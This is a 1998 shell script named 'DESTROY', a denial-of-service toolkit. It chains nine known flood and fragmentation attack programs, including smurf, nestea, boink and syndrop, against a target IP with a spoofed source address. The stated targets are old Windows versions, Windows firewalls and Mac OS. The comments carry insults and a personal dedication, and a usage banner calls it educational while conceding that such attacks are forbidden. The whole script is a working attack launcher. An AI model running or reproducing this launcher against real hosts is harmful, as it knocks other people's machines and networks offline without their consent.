#!/bin/sh
#DESTROY 1.0 is tools kit for destroy all win + firewall and macos
#DESTROY 1.0 BY CAMELEON G. 3octo1998
#DESTROY 1.1 normale puissance!
#JE t'aime christelle!
#FUCK:billou, windaube,www.arctik.com (larcenous of prog!)

#while
TT=1
MAX=1024

#INSCRIPTION DES PROG
pr1=./1234
pr2=./destroy
pr3=./2-1234
pr4=./FOAD
pr5=./2-FOAD
pr6=smurf5
pr7=nestea
pr8=boink
pr9=syndrop

#packet option
PKTSF=10000
PKTSN=100
PKTS=10
PKTSD=5000
PKTSED=2000

#destroy option

SRC=$1
DST=$2
BC=bcast

if [ $# -ne 2 ]; then
        echo "DESTROY TOOL KIT BY CAMELEON G. 3octo1998"
        echo "DESTROY affecte: all win (98,95,3.1,NT),firewall win , macos"
        echo "DESTROY 1.1 NORMALE PUISSANCE"
        echo "I LOVE YOU CHRISTELLE!"
        echo "$0 <ip spoof> <dst ip>"
        echo "ex:./DESTROY www.arctik.com 127.0.0.1"
        echo "no lag with this prog"
        echo "PROG A BUT EDUCATIF"
        echo "les attacks denial of services sont interdite!"
        echo "l'attaque est tres longue :("
        exit 0
fi

while [ $TT -lt $MAX ]; do
       $pr6 $DST $BC -P icmp -n $PKTSD
       $pr7 $SRC $DST -s 139 -t 139 -n $PKTS
       $pr1 $SRC $DST $PKTSF
       $pr2 $SRC $DST $PKTSD
       $pr3 $SRC $DST $PKTSN
       $pr4 $SRC $DST $PKTSN
       $pr5 $SRC $DST $PKTSN
       $pr8 $SRC $DST 137 140 $PKTS
       $pr9 $SRC $DST -s 139 -t 139 -n $PKTSN
exit 0
done

exit 0

end DESTROY